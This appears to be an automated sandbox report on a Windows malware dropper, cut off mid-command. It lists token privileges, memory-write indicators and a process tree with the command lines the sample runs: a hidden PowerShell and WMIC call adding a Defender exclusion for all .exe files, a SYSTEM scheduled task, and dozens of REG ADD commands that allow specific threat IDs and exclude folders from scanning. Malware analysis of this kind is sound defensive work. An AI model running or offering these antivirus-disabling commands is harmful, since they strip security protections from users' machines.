Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1080 wrote to memory of 3880 N/A C:\Users\Admin\AppData\Local\Temp\0ec320aaa56b4b15c383f18c688ee20209ec152e1d716483bc00449a9e5ea184.exe C:\Users\Admin\AppData\Local\Temp\7zS3662.tmp\Install.exe
PID 1080 wrote to memory of 3880 N/A C:\Users\Admin\AppData\Local\Temp\0ec320aaa56b4b15c383f18c688ee20209ec152e1d716483bc00449a9e5ea184.exe C:\Users\Admin\AppData\Local\Temp\7zS3662.tmp\Install.exe
PID 1080 wrote to memory of 3880 N/A C:\Users\Admin\AppData\Local\Temp\0ec320aaa56b4b15c383f18c688ee20209ec152e1d716483bc00449a9e5ea184.exe C:\Users\Admin\AppData\Local\Temp\7zS3662.tmp\Install.exe
PID 3880 wrote to memory of 4348 N/A C:\Users\Admin\AppData\Local\Temp\7zS3662.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 3880 wrote to memory of 4348 N/A C:\Users\Admin\AppData\Local\Temp\7zS3662.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 3880 wrote to memory of 4348 N/A C:\Users\Admin\AppData\Local\Temp\7zS3662.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 4348 wrote to memory of 1544 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 4348 wrote to memory of 1544 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 4348 wrote to memory of 1544 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 1544 wrote to memory of 2612 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1544 wrote to memory of 2612 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1544 wrote to memory of 2612 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2612 wrote to memory of 3300 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 2612 wrote to memory of 3300 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 2612 wrote to memory of 3300 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 3880 wrote to memory of 2272 N/A C:\Users\Admin\AppData\Local\Temp\7zS3662.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 3880 wrote to memory of 2272 N/A C:\Users\Admin\AppData\Local\Temp\7zS3662.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 3880 wrote to memory of 2272 N/A C:\Users\Admin\AppData\Local\Temp\7zS3662.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 4636 wrote to memory of 2120 N/A C:\Users\Admin\AppData\Local\Temp\BOcTyFPPxAyjCEkla\ZdAYUvLVhVtfvZJ\ENTxXds.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4636 wrote to memory of 2120 N/A C:\Users\Admin\AppData\Local\Temp\BOcTyFPPxAyjCEkla\ZdAYUvLVhVtfvZJ\ENTxXds.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4636 wrote to memory of 2120 N/A C:\Users\Admin\AppData\Local\Temp\BOcTyFPPxAyjCEkla\ZdAYUvLVhVtfvZJ\ENTxXds.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2120 wrote to memory of 4296 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2120 wrote to memory of 4296 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2120 wrote to memory of 4296 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 4296 wrote to memory of 2004 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4296 wrote to memory of 2004 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4296 wrote to memory of 2004 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 736 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 736 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 736 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 3968 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 3968 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 3968 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 2844 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 2844 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 2844 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 3604 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 3604 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 3604 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 3116 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 3116 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 3116 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 2420 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\Conhost.exe
PID 2120 wrote to memory of 2420 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\Conhost.exe
PID 2120 wrote to memory of 2420 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\Conhost.exe
PID 2120 wrote to memory of 1820 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 1820 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 1820 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 1548 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 1548 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 1548 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 3608 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 3608 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 3608 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 5044 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 5044 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 5044 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 4552 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 4552 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 4552 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 4376 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 4376 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 4376 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 3464 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe

Processes

C:\Users\Admin\AppData\Local\Temp\0ec320aaa56b4b15c383f18c688ee20209ec152e1d716483bc00449a9e5ea184.exe

"C:\Users\Admin\AppData\Local\Temp\0ec320aaa56b4b15c383f18c688ee20209ec152e1d716483bc00449a9e5ea184.exe"

C:\Users\Admin\AppData\Local\Temp\7zS3662.tmp\Install.exe

.\Install.exe /AdidysikD "385118" /S

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bpJjqbWMDOjxkYrvBb" /SC once /ST 05:01:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\BOcTyFPPxAyjCEkla\ZdAYUvLVhVtfvZJ\ENTxXds.exe\" Oz /Lssite_idCpU 385118 /S" /V1 /F

C:\Users\Admin\AppData\Local\Temp\BOcTyFPPxAyjCEkla\ZdAYUvLVhVtfvZJ\ENTxXds.exe

C:\Users\Admin\AppData\Local\Temp\BOcTyFPPxAyjCEkla\ZdAYUvLVhVtfvZJ\ENTxXds.exe Oz /Lssite_idCpU 385118 /S

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\BxVXPYvVqGWoUZKItHR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\BxVXPYvVqGWoUZKItHR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\VDiAXGzPiWUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\VDiAXGzPiWUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\epUZFeichsCPC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\epUZFeichsCPC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\fZHZowTYSgfU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\fZHZowTYSgfU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qBvbbKpBU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qBvbbKpBU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\nxeoDZreGracWIVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\nxeoDZreGracWIVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v 